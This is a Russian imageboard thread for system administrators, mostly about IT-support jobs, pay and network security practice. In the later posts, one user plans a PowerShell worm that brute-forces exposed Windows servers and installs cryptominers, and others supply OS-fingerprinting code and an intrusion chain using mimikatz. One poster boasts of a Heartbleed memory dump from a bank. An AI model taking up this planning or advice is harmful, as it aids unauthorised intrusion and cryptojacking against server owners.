Находил ли кто вакансии IT-поддержки в каких-нибудь НИИ или ОКБ? Именно поддержки - обычным эникеем/сисадмином/специалистом по линухам/AD/сетевиком, а не хардовым научным сотрудником? Или в такие золочёные места всё равно нужно ВО, даже если ты будешь просто картриджи менять?
Аноним 01/01/18 Пнд 21:41:26 #411 №1158568 
>>1158540
Они не только обслуживают, но и проектируют/внедряют новые системы. Соответственно там можно быть проектировщиком/внедренцем/суппортом (это специализация инженера).
А еще есть пресейлы, архитекторы, ГИПы, но это уже дальше.
Аноним 02/01/18 Втр 00:22:10 #412 №1158603 
14231583598170.jpg
Антоны, почти два года работаю в полуайтишной компании сис. одменом эникееем по факту, наверное. Честно, уже заебало, и развития там уже почти не стало. Научился поднимать/настраивать шиндосерверы, виртуальными атсками, небольшой ремонт пекарней, подключение/настройки торгового оборудования, видеонаблюдение, даже приходилось переделывать сайтик компании, курил мануалы по js/html/css, за пару месяцев курения сделал много прикольных фич... но вот на HH в основном те же условия и та же зарплата 20-25к. Блять у меня уже отчаяние, как можно с обвалом рубля жить на такие деньги...
Что можно предпринять, куда вкатываться, что подтянуть?
Аноним 02/01/18 Втр 19:03:56 #413 №1158763 
>>1158603
Если живешь в провинции и хочешь денег, то дрочи 1С. Все остальное в мухосрани нахуй не всралось никому.
Аноним 02/01/18 Втр 20:31:12 #414 №1158783 
>>1158763
Казань
Аноним 03/01/18 Срд 11:48:38 #415 №1158857 
Опишите типичные рабочие задачи в Мухосранском не айтишном ООО на 10 человек?
Аноним 03/01/18 Срд 16:43:53 #416 №1158936 
>>1158857
>Опишите типичные рабочие задачи в Мухосранском не айтишном ООО на 10 человек?
чинить стулья
делать кунилингус главному бухгалтеру
собирать мебель
ну ещё может быть пару раз в месяц переустановить винду
Аноним 03/01/18 Срд 19:06:50 #417 №1158967 
Хэлло Воркач! Где лучше искать удаленную работу админу?

Есть хороший бэкграунт энтерпрайзного говна типа сццм, гипер-в, аксапты и эксченджа. Плюс vmware вся линейка. Плюс железяки любые, могу проектировать небольшие ДЦ. Сети на уровне админа в провайдере(есть подтвержденный опыт). Ну и линукс тоже шарю, но не шибко. Хочу хотя бы $1500. Инглиш на уровне чтения любого говна(не выше).

Сейчас работаю руководителем за 150к в ДС, собираюсь свалить в Тай лет на 5.
Аноним 03/01/18 Срд 20:38:55 #418 №1158999 
Посоны, поясните кто-нибудь за философию в computer science. Услышал тут что есть прям отдельная такая дисциплина на западе, по крайней мере курс её проходят там в учебных заведениях. В чём суть?
Аноним 03/01/18 Срд 21:38:02 #419 №1159026 
>>1158967
Хер знает. То, что ты описал - вмваре, сццм и т.д.. Сети на уровне админа провайдера...это конечно все здорово, если бы ты искал работу на полный день в офис. Но как ты хочешь найти подобную работу удаленно? Из админства удаленно это только линуха и девоопсы всякие.
Или по знакомству работку кто подкинет.
Аноним 03/01/18 Срд 22:09:30 #420 №1159040 
>>1157432
Ну Оракл по-моему только так и можно осилить, это же блядь, ёбаное тайное знание, которое из поколение в поколение передаётся и всё равно обязательная техподдержка, ибо пошёл ты нахуй, вот почему.
Аноним 03/01/18 Срд 22:18:11 #421 №1159042 
>>1149761 (OP)
>Тасклист для Linux админа: https://www.reddit.com/r/linuxadmin/comments/2s924h/how_did_you_get_your_start/cnnw1ma
Насколько же это охуенно, хотя я чуть сознание не потерял, читая, приговаривая "ух бля" и осознавая одновременно и объём работы, и сколько всего я не знаю.
Алсо, нахуя вы себе конкурентов-то плодите, лол. Треды реально шикарные, ПРОСТО бери и делай
Аноним 03/01/18 Срд 23:01:33 #422 №1159057 
>>1158603
Вкатывайся в ДС
Аноним 04/01/18 Чтв 11:10:00 #423 №1159134 
>>1158999
Думаю, всё ограничивается курсами истории развития философского мышления да детальным рассмотрением научного метода.
Аноним 04/01/18 Чтв 16:45:55 #424 №1159216 
>>1159042
Виртуальная машина виртуальной машиной погоняет. Сколько же мне ОЗУ нужно для всего этого? Моя кора дуба и 4гб такого не потянут.
Аноним 04/01/18 Чтв 17:07:19 #425 №1159222 
>>1159042
>Алсо, нахуя вы себе конкурентов-то плодите, лол.
Реальные конкуренты могут вырасти только отработав пару-тройку лет на реальной работе.
Дроча виртуалки никаким админом никогда не стать.
Аноним 04/01/18 Чтв 19:35:49 #426 №1159259 
14361770683820.jpg
>>1149761 (OP)
Иду устраиваться сис админом на завод в своей мухосрани. Знаний хуй да нихуя, хотя уверен что возьмут. Так вот, есть ли какие то тонкости о которых мне стоит знать и какую работу нужно выполнять а какую нет за 10-15 тыщ?
Аноним 04/01/18 Чтв 19:42:13 #427 №1159260 
>>1159259
Смотря какие обязанности
> есть ли какие то тонкости о которых мне стоит знать
Если что то работает, не старайся с горящими глазами сделать это лучше. Иначе сломаешь, и будут на тебя говно изливать. Лучше тру изучить дело/технологию, если не совсем уверен в своих силах, а потом уже понемногу перепиливать, если захочешь.
Как правило сложные задачи появляются внезапно, изза поломки. Тут и появляется опыт
Аноним 04/01/18 Чтв 19:45:23 #428 №1159261 
>>1159260
Хотел бы узнать насчет установки программ\винды, на предприятии ведь обязательно все лицензионное?
Аноним 04/01/18 Чтв 19:47:43 #429 №1159264 
>>1159261
Завод государственный? Я в частной работаю, шиндовсы юзаем лицуху, все остальное либо опенсорс, либо крякнутое
Аноним 04/01/18 Чтв 21:27:46 #430 №1159279 
>>1159264
Точно не знаю, вроде нет.
Аноним 04/01/18 Чтв 22:20:41 #431 №1159289 
>>1159222
>Дроча виртуалки никаким админом никогда не стать.
Я именно надрачивая виртуалки пошёл работать за 50к, так и стал админом.
Аноним 04/01/18 Чтв 22:22:03 #432 №1159290 
>>1159134
Не, даже беглое гугление выдаёт информацию, по которой там несколько разделов и много своих специфичных терминов. Вот и интересуюсь, есть ли тут кто-то в теме.
Аноним 04/01/18 Чтв 22:49:01 #433 №1159304 
>>1159279
По мелочи для себя на свой рабочий комп думаю похуй. А вот что ставить юзверям обговори с начальником, может он сам ссыт проверок. Моему начальнику таки похуй, он себе на комп даже попросил крякнуть шинду, что бы не тратить лицуху
Аноним 05/01/18 Птн 10:59:14 #434 №1159401 
Вчера встретил знакомую девочку. Маникюр делает.
Спросил у неё сколько денег за декабрь заработала. Так она говорит — 150 чистыми, без учета материалов. Это в ДС, конечно.
Привет, админы, как у вас там дела? На еду-то хватает вам? Кредит выплатили уже за микроволновку?
Аноним 05/01/18 Птн 11:01:54 #435 №1159402 
Чувствую, что ещё пара годков и матери будут пугать своих детей, мол, плохо будешь учиться — станешь админом, будешь картриджи менять и винду переустанавливать. Как сегодня пугают дворником. Дворникам, кстати, в ДС 60 платят. Если пару участков лишних возьмешь, то сотку, думаю, моэжно заработать.
Аноним 05/01/18 Птн 12:36:20 #436 №1159425 
Понимаю, что может быть не совсем тематика треда, но всё же.

Подумываю вкатиться в ремонт телефонов и около того.
Опыта нет, но думаю, что на начальном этапе справиться смогу, а дальше обучусь.
Экранчики там на своих телефонах менял, динамики, всякое такое вот. Ну и в целом почти всё по мелочи сам делал ноут от пыли почистить, всё такое.
Руки не из жопы, вроде.
Живу в ДС, так что вакансий должно быть достаточно.

Собственно, вопросы:
1) Норм-ли платят и сколько вообще там шекелей есть?
2) Насколько реально вкатиться?
3) Есть смысл? Понимаю, что если есть желание - смысл есть, но может я просто тупой и не вижу способов применения.
4) Хуйня или нет?
Аноним 05/01/18 Птн 12:46:02 #437 №1159429 
>>1159425
>Понимаю, что может быть не совсем тематика треда, но всё же.
>
>Подумываю вкатиться в ремонт телефонов и около того.
>Опыта нет, но думаю, что на начальном этапе справиться смогу, а дальше обучусь.
>Экранчики там на своих телефонах менял, динамики, всякое такое вот. Ну и в целом почти всё по мелочи сам делал ноут от пыли почистить, всё такое.
>Руки не из жопы, вроде.
>Живу в ДС, так что вакансий должно быть достаточно.
>
>Собственно, вопросы:
>1) Норм-ли платят и сколько вообще там шекелей есть?
>2) Насколько реально вкатиться?
>3) Есть смысл? Понимаю, что если есть желание - смысл есть, но может я просто тупой и не вижу способов применения.
>4) Хуйня или нет?
Ничег не хуйня, главное делай хорошо.
Можно потом подраюатывать на стороне, чинить телефоны знакомым за деньги и т.д.
По мне так нормальный вариант.
Аноним 05/01/18 Птн 15:52:15 #438 №1159481 
>>1159401
Что-то мало. Я как-то нашёл телефон потерянный, по фоткам и СМСкам понял что хозяйка ногти стригла и лакировала, при этом ходила по домам, так у неё поступления на счёт шли по 30-50 штук раз 7-9 в месяц.
Аноним 05/01/18 Птн 15:52:49 #439 №1159482 
>>1159402
Сколько видел дворников - меньше сотыги не получали.
Аноним 05/01/18 Птн 16:17:26 #440 №1159492 
>>1159481
> 30-50 штук раз 7-9 в месяц.
ну чё 300-500 тысяч. Норм з.п. для ДС. Меньше только у админов и дворников.
Аноним 05/01/18 Птн 17:22:25 #441 №1159516 
>>1159304
Значит в случае чего ебут начальство а не сис админа?
Аноним 05/01/18 Птн 18:21:03 #442 №1159544 
Кто что собирается делать с мелтдовеном и спектром после праздников? Или все уже экстренно обновляются?
Аноним 05/01/18 Птн 18:36:50 #443 №1159558 
>>1159544
Активных атак пока не было, публичных инструментов тоже не появилось. Неспешно обновлю когда всё протестируют.

Но если бы у меня было облако и я предоставлял другим сервисы, то сразу бы напрягся.
Аноним 05/01/18 Птн 21:46:03 #444 №1159637 
image.png
>>1159492
Аноним 05/01/18 Птн 21:51:27 #445 №1159638 
>>1159544
Обновил уже.
Алсо, атака - хуйня.
В прошлый когда HeartBleed была - там тоже можно было куски памяти читать.
Причём средства были.
Ну поставил дампиться с сервера банка память на дня 3.
НИХУЯ в итоге не было в этих гигабайтах памяти. Просто НИХУЯ.
Аноним 05/01/18 Птн 21:55:14 #446 №1159639 
photo2018-01-0521-29-45.jpg
>>1159544
>>1159638
Аноним 06/01/18 Суб 04:12:30 #447 №1159708 
>>1159482
Активно общаешься с дворниками?
Аноним 06/01/18 Суб 08:44:30 #448 №1159714 
Мамашу создателя баша, в театр водил. Какие же это старые костыли.
Аноним 06/01/18 Суб 10:31:16 #449 №1159720 
>>1159429

Спасибо за совет!

А есть кто-то работавший в этой сфере?
Аноним 06/01/18 Суб 11:28:24 #450 №1159729 
>>1159708
Да, планирую перекатываться с админа, вот и разведываю обстановку.
Аноним 07/01/18 Вск 13:37:34 #451 №1160023 
>>1150138
>Третья линия (CCNA/CCNP, MCSA, на живых людей не выходят, или выходят крайне редко, решают глобальные проблемы, не разбираются почему не работает мышка)
>Это где так? Хочу работать там , где за меня будут передергивать порты и назначать айпишинки, а я буду только дизайном заниматься и всякими внедроениями

В абсолютно любом нормальном энтерпрайзе. Вообще, SLA и ITIL не просто красивые слова, вот это вот всё реально охуенно работает.
Аноним 07/01/18 Вск 13:40:17 #452 №1160027 
>>1160023
>В абсолютно любом нормальном энтерпрайзе
Это какой же величины должен быть энтерпрайз? Банк топ-3?
Аноним 07/01/18 Вск 13:54:09 #453 №1160044 
>>1151529
>>1151538
>>1151566
>>1151965
>>1152301
>>1152549
>>1152745
>На каникулах уже покопаюсь.
Так вот, только что покопался. Ничего не перебито, только между разъемом ATX и фишкой фена №1 зажали пару толстых проводов от питания бэкплейна. Фишка встала криво, контакт термодатчика как раз не контачит. Так что с диагнозом угадал. Надо будет теперь пачку стяжек заказать завхозу, да переложить все.
Пишу просто чтоб закрыть вопрос.
Аноним 07/01/18 Вск 14:02:38 #454 №1160051 
>>1160027
>Это какой же величины должен быть энтерпрайз? Банк топ-3?

Практически любой. Самое главное - общая концепция, она масштабируемая.
Аноним 07/01/18 Вск 16:54:34 #455 №1160105 
>>1160051
>Практически любой. Самое главное - общая концепция, она масштабируемая.
ну вот ты полагаешь, что в конторе с 1000 чел. и тремя офисами в ДС и паре филиалов будут держать сетевика, который только занимается "Дизайном"? Хотя какой тут дизайн вообще может быть.
Аноним 07/01/18 Вск 19:28:57 #456 №1160183 
>>1160105
>ну вот ты полагаешь, что в конторе с 1000 чел. и тремя офисами в ДС и паре филиалов будут держать сетевика, который только занимается "Дизайном"? Хотя какой тут дизайн вообще может быть.

Как-минимум первую-вторую линию поддержки обеспечить можно. Возможно человек на второй линии и не будет заниматься только дизайном, но уж точно он не должен делать простейшую работу и не должен контактировать с пользователя напрямую.
Аноним 08/01/18 Пнд 14:27:10 #457 №1160423 
>>1158529
Аноним 08/01/18 Пнд 14:39:43 #458 №1160428 
>>1158540
>админско-эникейный аутсорс
да, как обычный ойти отдел, только сразу на дохуя инфраструктур. к вопросу откуда брать знания - как правило, когда проект уже передан на поддержку, то есть хоть какая-то документация.
>чтобы хотя бы понять, откуда начать расспрашивать клиента
заняться хоть какой-то диагностикой. связаться с заказчиком, поебать ему мозги, назадавать кучу вопросов. есть масса способов потянуть время, пока въезжаешь что да как. в целом, это всё-таки ойти организация, и ситуации вида "пришёл на работу нуб, затупил, и у клиента всё пиздец стало раком" возникают достаточно редко. поначалу точно будут помогать.

очень много зависит от умения общаться с людьми и убеждать их. я бы сказал, что это значит много больше, чем фактический уровень владения внедряемыми продуктами и технологиями. люди, которые одновременно умеют хорошо пиздеть и хорошо внедрять-саппортить-траблешутить, наиболее ценятся в таких конторах, у них больше всего зарплата и им меньше всего ебут мозг.
Аноним 08/01/18 Пнд 14:58:27 #459 №1160440 
>>1158541
Бывают такие. В/о вряд ли требуется. Приобретёшь бесценный опыт починки экзотического ПО и/или оборудования. То есть проебёшь несколько лет впустую.

>>1158568
>пресейлы, архитекторы, ГИПы
По нынешним временам это скорее не позиции, а роли. Т.е. на одном проекте ты гип, на другом орхитектор, на третьем консультант, на четвёртом саппортишь иногда. Так гораздо дешевле, чем держать отдельных "архитекторов" и гипов. Так не везде, но уже много где.

>>1158967
Варианты бывают, но редко. Видел где-то год назад вакансию удалённого одмена со всем, чем ты перечислил, но за 800 бачей.

>>1159289
>Я именно надрачивая виртуалки пошёл работать за 50к
Речь идёт о том, что админ, всего лишь подрочивший виртуалки и поустанавливавший на них жмупинус, не составит реальной конкуренции инженеру с многолетним опытом.

>>1159401
>Спросил у неё сколько денег за декабрь заработала. Так она говорит — 150 чистыми
Элементарная ложь, что я могу сказать


Аноним 08/01/18 Пнд 15:24:04 #460 №1160453 
>>1160440
>Бывают такие. В/о вряд ли требуется.

Во все стратегические ОКБ ДС и ДС-2 требуется.

>>1160440
>Элементарная ложь, что я могу сказать

Не факт. У нормального мастера сеанс вполне может стоить от 3к рубасов.
Аноним 08/01/18 Пнд 16:21:44 #461 №1160478 
>>1160453
Не, ноготки меньше 7к за сеанс мусор, это тебе кто угодно скажет, так что бери среднюю стоимость сеанса в 8-10к. В день мастер может проводить 5-7 таких.
Аноним 09/01/18 Втр 08:11:11 #462 №1160597 
>>1160478
>Не, ноготки меньше 7к за сеанс мусор, это тебе кто угодно скажет, так что бери среднюю стоимость сеанса в 8-10к. В день мастер может проводить 5-7 таких.
Кстати, барберы нормальные в хороших барбершопах тоже под 200к в месяц имеют.
Аноним 09/01/18 Втр 08:41:13 #463 №1160606 
>>1160478
Пиздишь, как дышишь, жена ходит в салон каждую неделю по 2 раза. Стоит маникюр 1к рублей. Если, вдруг, давно не делала или есть серьезно поломанные ногти - 2-2,5к за сеанс. Да, есть салоны, где берут в 2-3 больше - туда тоже пробовала ходить, но... разницы в результате нет никакой, лол. А фантастические зарплаты маникюрш в декабре - это норма, т.к. перед праздниками они работают 24/7 - спрос колоссальный же.

>>1160597
>барберы нормальные в хороших барбершопах тоже под 200к в месяц имеют.
Ну так и парикмахеры тоже. Сложная женская стрижка с окраской омбре может доходить до 30к рублей... и ее еще надо каждые ~2 недели подкрашивать и подравнивать, что тоже стоит по 3-5к рублей. Пришел, отдал 25к разом и сразу записался на 10 дней вперед еще на 5к.
Аноним 09/01/18 Втр 09:18:53 #464 №1160611 
15142944548460.jpg
>>25159679
Люто двачую, я в те годы играл в новейший КС сорс, и в буквальном смысле карал всех с калаша с счётом 30-3 или 35-4, а сейчас дай бог убивать не 1 к 1, ещё я тогда дохуя играл в ла2, и мог за ТХ нагнуть целую консту, скидывал паровоз и добивал выживших, сейчас я бы хуёв пососал. С годами реакция притупляется, правильно говорят, что пиздюком время идёт долго, поэтому ты успеваешь замечать и реагировать на малейшие изменения
Аноним 09/01/18 Втр 09:21:04 #465 №1160612 
>>1160611
Миснул мимо /vg/, сорян, парни
Аноним 09/01/18 Втр 12:26:24 #466 №1160650 
>>1160606
Ну так я и говорю, админам далеко до парикмахерш с тремя классами образования.
Аноним 09/01/18 Втр 12:48:20 #467 №1160654 
>>1160606
>Ну так и парикмахеры тоже
У меня есть парикмахер - чурка, приехал из аула, но стрижёт как бог, лучше чем он, меня только стригла знакомая стилистка с рашитудей, но у неё пиздец график, что хуй попадёшь. Я этому парнише каждый раз даю на чай 300-500р от настроения, и буду платить почти любые деньги до 2к рублей, что бы стричься у него дальше
Аноним 09/01/18 Втр 12:51:28 #468 №1160655 
Админы, думал об очередном майнер-вирусе на powershell, и тут задумался, а как через powershell удалённо можно понять какой перед тобой узел: linux, windows, cisco, мне бы точнее вытащить из всего только windows, так как powershell
Даже если ты попал на какой-то открытый сервак с SAMBA, ты получишь рабочие 445 и 137-139 порты, но это не значит, что перед тобой windows и можно перебирать пароли по циклу
Аноним 09/01/18 Втр 13:04:31 #469 №1160659 
>>1160655
Проверки ttl вкупе с 139 портом для твоих целей хватит более чем.
Аноним 09/01/18 Втр 13:18:59 #470 №1160663 
>>1160659
>ttl
Cisco TTL > равен 255
ttl windows > равен 128
Unix ttl > равен 64
Android и IOS Apple> 65
Lumia > 130

Погуглил, а ты прав, хорошая мысль, не знал, что у них разны ttl
Аноним 09/01/18 Втр 13:28:48 #471 №1160669 
>>1160663
В детстве во дворе вы в хакеров не играли что-ли?! Олсо ttl можно поменять локально, но ни разу не видел, чтобы так делали, всё равно nmap не обманешь - он более сложные сигнатуры использует. Олсо 127, очевидно, тоже будет винда, просто за роутером.
Аноним 09/01/18 Втр 13:41:15 #472 №1160672 
>>1160669
Надо подумать как его в powershell засунуть
У него ведь нету утилиты командной строки? Не юзал его, ща попробую
Аноним 09/01/18 Втр 13:58:10 #473 №1160680 
>>1160672
Я догадывался, что это можно сделать через Test-Connection, но без гугла и без винды под рукой сам бы не сообразил как:

$ComputerName = "computerName"
$TimeToLive = Test-Connection $ComputerName -Count 1 | select -exp ResponseTimeToLive

Switch($TimeToLive)
{
{$_ -le 64} {"Linux"; break}
{$_ -le 128} {"Windows"; break}
{$_ -le 255} {"UNIX"; break}
}
Аноним 09/01/18 Втр 14:07:44 #474 №1160685 
>>1160680
Да, надо протестить, интересная мысль, и ещё впихнуть туда доступность портов, так как без SMB всё равно хуй там плавал
Аноним 09/01/18 Втр 14:09:00 #475 №1160687 
>>1160685
А что за извращение писать на повершел такое? Аргументы против:
- по умолчанию мало где установлен - только в 8, 8.1 и 10, т.е. 7-ка мимо, а 90% корпоратива до сих пор на ней сидит.
- ps ранних версий не полностью совместим с 5.1, при этом в 8-ке стоит 3.0, в 8.1 - 4.0, в 10 - 5.1, т.е. тебе надо всё писать на 3.0, чтобы наверняка "везде" заработало.

Олсо сам майнинг всё равно ведь будет через payload, а на ps только сам червь? Я, правда, ХЗ на чем там сейчас червей под винду пишут...
Аноним 09/01/18 Втр 14:43:20 #476 №1160702 
>>1160687
Ну поэтому и был план на повершелле, что бы просто циклом перебрать стандартные логины и пароли, и найти хосты на винде
От повершелла я хочу - найти туда куда можно сделать подключение, запустить его через VPN или TOR и пусть себе сканирует подсети на всякие admin/admin, или на SMB без пароля, а там уже дальше будем плясать от полученной информации

Вообще, так-то да, можно ещё на баше написать чтобы чекал открытый 22 порт для любителей маленьких мальчиков открывать себе SSH без VPN. Только root логон совсем у аутистов будет включен

Первоочередной целью ставлю просто облачные серваки, на которые админы любят заливать бекап и забывать о их существовании на многие годы, ломать целые корп сети - безумие

Мне кажется все вирусы пишут на питоне, так как на питоне можно написать всё, что угодно, а на с++ написать сам питон
Аноним 09/01/18 Втр 16:19:05 #477 №1160767 
>>1160702
>22 порт для любителей маленьких мальчиков открывать себе SSH без VPN. Только root логон совсем у аутистов будет включен
У меня обычно ssh на нестандартном порту + fail2ban + отключена авторизация по паролю, только по ключам. Если на сервер хожу только я, то еще port knocking настраиваю. И вроде норм все.
Аноним 09/01/18 Втр 16:19:24 #478 №1160769 
>>1160702
Подобный червь должен иметь управляющий сервер, куда он будет сгружать всё, что нашел интересного, ну или что успел намайнить. Так что итоговая реализация не такая то и простая будет, потому что управляющие сессии находят и режут абсолютно все системы безопасности, основанные на анализе активности сети/приложений (т.е. и локальные касперские, и фаерволы на границе сети).

>вирусы пишут на питоне
Вредонос пишется на том, что может быть исполнено на атакуемой системе. Так как 99% атакуемых систем под виндой, где питона по умолчанию нет, то и писать на нем зловред бессмысленно. Всякие py2exe, конечно, есть, но не проще-ли сразу писать на сях/асме с применением winAPI? На пайтоне разве что реализуют эксполиты, но их и на всём подряд пишут, от си и баша, до перла и пхп.

>Первоочередной целью ставлю просто облачные серваки
А как ты хочешь заставить эти серваки выполнять свой код? У тебя какой-то эксплоит уже припасен для этого? Просто подобрать логин/пароль к файловому серверу еще недостаточно... особенно в доменной сети, где на несколько тысяч учетных записей только несколько обладают нужными правами и к ним то как правило пароль брутом не подобрать никак...
Аноним 09/01/18 Втр 16:21:59 #479 №1160771 
>>1160767
А в чем смысл fail2ban, если авторизация только по ключу? Олсо нестанадратный порт тут как бы тоже ни к чему - всё равно найдут и всё равно не подключатся никогда. Лучше уж сделать фильтрацию по доверенным подсетям или вообще только через vpn ходить во внутренние сети.
Аноним 09/01/18 Втр 16:31:11 #480 №1160775 
>>1160771
Просто перестраховка, лол. А фильтрацию по доверенным подсетям не всегда есть возможность сделать, с VPN тоже самое.
Аноним 09/01/18 Втр 16:33:09 #481 №1160776 
>>1160771
>fail2ban
Я думаю цель, в том, чтобы не создавать флуда, если у тебя есть какой-то виндовый сервак смотрящий в интернет попробуй посмотреть сколько туда подключается каждую секунду

>>1160767
Верно у меня также, хотя и нету бана за фейлы, и вообще закрыт любой SSH на внешний интерфейс, только изнутри и ВПН

>>1160769
Тоже верно, мне интересно просто побрутить и покидать майнеры в автозагрузку

Да, про язык ты прав, в любом случае у меня в планах просто повершелл

Я пока хотел просто подкинуть файл и всё, в домены лезть - себе дороже, если найдут, то посадят на бутылку


Парни ещё раз, атака только на внешние вин сервера где можно набрутить пароль, успокойтесь, хацкеры

Кстати, если память не изменяет, то в домене обычно забирают хэши паролей, и по радужным картам ищут соответствие. Хотя опять же в какой сегмент попадёшь, ну а может дальше линёвого сервера и не уедешь
Аноним 09/01/18 Втр 16:34:04 #482 №1160777 
>>1160775
>с VPN тоже самое
Да ладно, тут я не согласен опенвпн сервер можно поднять минут за 5 и всё затолкать в 443 порт
Аноним 09/01/18 Втр 16:34:20 #483 №1160778 
>>1160702
>root логон совсем у аутистов будет включен
Ага, он уже давно по умолчанию в конфиге sshd выключен.
>ломать целые корп сети - безумие
Внезапно, нет! Ты ведь заранее никогда не знаешь что за каждым конкретным IP-шником... и шанс, что там дырявый корпоративный сервак торчит наружу всегда есть. Собственно, именно так и ломают корпоративные сети: берешь интересные тебе AS-ки и долбишь их во все щели... Если это таргетированная атака, то, конечно, долбишь как можно нежнее, но суть всё равно та же - найти косяки в конфигурации сервисов или непропатченные сервисы. А вот через web корпорат и правда почти не сломать - публичные сайты хостятся отдельно от внутренней инфры. Во-первых, чтобы дос сайта не влиял на доступность инфры, во-вторых, чтобы сложнее было найти точки входа в саму инфру (не у всех же своя AS), ну и еще потому что веб куда более дырявый - потерять корпоративный сайт на пару дней не так страшно, как пустить взломщиков внутрь основной инфры.

>>1160775
Впн через SSL как раз всегда можно сделать и работать будет везде, т.к. закрыть SSL сегодня == закрыть весь инет. Фильтрация по адресам хорошо работает, если ты получаешь доступ к ресурсу из счетного числа мест, например, с работы и из дома. Если надо зайти из другого места - всегда можно пройти через дом/работу.
Аноним 09/01/18 Втр 16:39:53 #484 №1160780 
>>1160777
>>1160778
Есть такие погромисты на похапэ, которым сложно настроить VPN-клиент. Если настраиваешь VPSку таким кадрам, то делать что-то лишнее себе дороже.
Аноним 09/01/18 Втр 16:40:28 #485 №1160782 
>>1160778
>Ага, он уже давно по умолчанию в конфиге sshd выключен.
можно вместо рута брать admin admin1 administrator adm и прочие вариации

>публичные сайты хостятся отдельно от внутренней инфры
Это опять же всё от аутиста админа зависит, ДМЗ не всегда делается, а иногда делают, лол пушка, воздуха в лёгкие наберите, проброс портов во внутреннюю сеть, при том не всегда для сервера, а иногда для какого-то видео регистратора или подобного китайского скама.
Да, тут надо найти точку входа

>>1160778
>Впн через SS
ну опенвпн юзает, какой там 1194 порт, по дефолту, вроде, я писал выше про 443, но казахстан уже пытался
Аноним 09/01/18 Втр 16:42:00 #486 №1160783 
>>1160780
Братишка, я тоже тупой, но опенвпн реально совсем просто:
10 команд и скопировать строки в конфиг, поменяв ИП адрес, даже на винде можешь сделать сервер
Аноним 09/01/18 Втр 16:45:56 #487 №1160786 
>>1160783
Я в курсе, лол. Но рассказывать об этом каждому встречному у меня уже нет желания.
Аноним 09/01/18 Втр 16:53:29 #488 №1160792 
>>1160776
>сколько туда подключается каждую секунду
Посмотрел
$ journalctl -xb | grep "sshd.Failed password" | wc -l
343

Это за сегодня. Не очень то и много. Большая часть ломится с логином root, лол.

>в домене обычно забирают хэши паролей
Сперва добывают именя пользователей. Это изи, т.к. логины почти всегда совпадают с почтой, которая весьма активно светится в инете на том же корпоративном сайте. Также можно быть уверенным, что у большинства топчиков и всяких важных шишек есть доступ к корпоративному vpn, который тоже реально найти. Дальше брутят пароли - у многих пользователей они весьма брутабельные. Дальше проникают в сеть, потом на машину пользователя. А там уже ловят админские хеши (а то и сами пароли, если винда старая) через mimikatz, потом брутят их. Это как один из векторов, связанный чисто с брутом логинов/паролей.

>>1160782
>найти точку входа
HINT: dig
.corp.ru MX

>проброс портов во внутреннюю сеть для регистратора
Ну такой дичи в энтрепрайзе обычно не встретить. Разве что службы безопасности нет совсем (только тогда какой же это, блядь, энтерпрайз?) или админ отмороженный настолько, что у них под носом сделал подобное, не отдавая себе отчета, что это почти что уже статья - умышленное создание бекдора, корпоративный шпионаж и т.д. и т.п. - безопасники 100% найдут у такого админа яйцо на которое можно наступить...
Аноним 09/01/18 Втр 16:54:36 #489 №1160794 
Потрясная разметка вышла. Прошу прощения.
>>1160792-_-
Аноним 09/01/18 Втр 17:32:03 #490 №1160813 
>>1160792
>Ну такой дичи в энтрепрайзе обычно не встретить
Зря ты так думаешь, в любой деревенской конторе до 100 человек с бюджетом на ИТ в виде двух эникеев, а такое даже в ДС часто встречается в ГОСах или просто всяких непонятных строительных/магазинчиках конторах
Я знал проектный институт, где директор сказал, что он ХОЧЕТ чтобы он смотрел камеры своего кабинета из телефона, и глупый дед-эникей просто сделал маппинг

>HINT: dig .corp.ru MX
А если это мелкая контора с почтой на яндексе:
mx.yandex.net. 35 IN A 77.88.21.89
Ну так-то да, мейл-ексчейнджер у крупной конторы будет светиться
Аноним 09/01/18 Втр 19:59:54 #491 №1160875 
И вот этот прекрасный момент, я стал суппортом вендора, вместо суппорта заказчика. Теперь меня трахаю в жёппу по миллион раз на день, обзывают пидорасом, причём в открытую и усмехаются в ебало. Ведь я теперь мусор, не человек.
Аноним 09/01/18 Втр 20:30:55 #492 №1160884 
>>1160875
Зачем твой вендор продаёт такое говно?
Аноним 09/01/18 Втр 21:33:06 #493 №1160897 
>>1160782
>а иногда делают, лол пушка, воздуха в лёгкие наберите, проброс портов во внутреннюю сеть
А как быть если нужен клиентский vpn, для доступа к внутренней сети? И он поднят средствами серверными, тем же openvpn. Без проброса порта или выделения внешнего адреса машине с адресом внутренним не сделать такого.
Аноним 10/01/18 Срд 05:05:01 #494 №1161006 
>>1160884

Потому что заказчик платит невъебенные бабки.
Аноним 10/01/18 Срд 07:42:58 #495 №1161017 
>>1160897
Проброс не есть плохо, но делать надо в дмз, а не во внутрянку.
Аноним 10/01/18 Срд 07:46:27 #496 №1161018 
>>1160813
100 человек - это не тыпрайз ни разу, а мелкий, средний бизнес. Госы, кстати, тоже разные бывают, в крупных обычно всё интеграторы делают, а не местные админы.
Аноним 10/01/18 Срд 07:48:56 #497 №1161020 
>>1160897
Представь свои чувства, когда купил последний айфон официально за 120к, а он не включился и аппл пожимает плечами и обещает что-то исправить в ближайшее время...
Аноним 10/01/18 Срд 07:51:11 #498 №1161021 
>>1160875
это >>1161020 было тебе, конечно...
Аноним 10/01/18 Срд 09:18:26 #499 №1161036 
>>1161018
>в крупных
Я тебе говорю про 100-500 человек ГОС, а в госах в 10к человек там обычно всё хорошо
Аноним 10/01/18 Срд 10:36:44 #500 №1161074 
>>1161017
Ну так из дмз доступ же не получить к внутренней сети, а от клиентского впн именно это и нужно.
Аноним 10/01/18 Срд 10:40:46 #501 №1161075 
>>1161017
>>1161074
Я вам больше скажу, принято организовывать ДМЗ через реверс прокси, каждый сервер из ДМЗ закидывать в свой сегмент сети, чтобы он не имел доступа к соседним серверам, и высшей степенью паранойи является ВПН из каждого конкретного сервера ДМЗ до локальной сети, то есть доступ из ДМЗ в локальную сеть, а из локальной в ДМЗ только через ещё одну отдельную сеть, но это топ кек, конечно же
Аноним 10/01/18 Срд 11:16:31 #502 №1161086 
1463331586youtu.be-jmy1bvtvji.jpg
>>1161074
>из дмз доступ же не получить к внутренней сети
Я имею в виду под дмз ту зону, где находятся рабочие терминальные сервера, например. Т.е. по впн ты можешь на них зайти, но не можешь зайти в локалку по этому же впн. Точно также из локалки можно попасть на те же терминальные сервера, но не во внешнюю сеть, которая за дмз. Интернет, если он нужен, где-то сбоку на локальной машине пользователя, на терминальных серверах, его, конечно, нет. И это как бы единственно корректная архитектура с точки зрения безопасности.

